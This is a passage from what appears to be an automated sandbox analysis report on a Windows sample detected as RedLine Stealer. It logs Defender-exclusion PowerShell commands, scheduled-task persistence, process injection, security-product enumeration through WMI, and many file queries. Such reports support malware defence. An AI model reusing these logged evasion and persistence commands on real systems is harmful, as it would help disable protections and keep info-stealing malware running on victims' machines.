                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory written: C:\Users\user\Desktop\lZ8NRWShfC.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory written: C:\Users\user\AppData\Roaming\TmfmVKU.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp"
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Users\user\AppData\Roaming\TmfmVKU.exe "C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Users\user\Desktop\lZ8NRWShfC.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Users\user\Desktop\lZ8NRWShfC.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Users\user\AppData\Roaming\TmfmVKU.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Users\user\AppData\Roaming\TmfmVKU.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPE
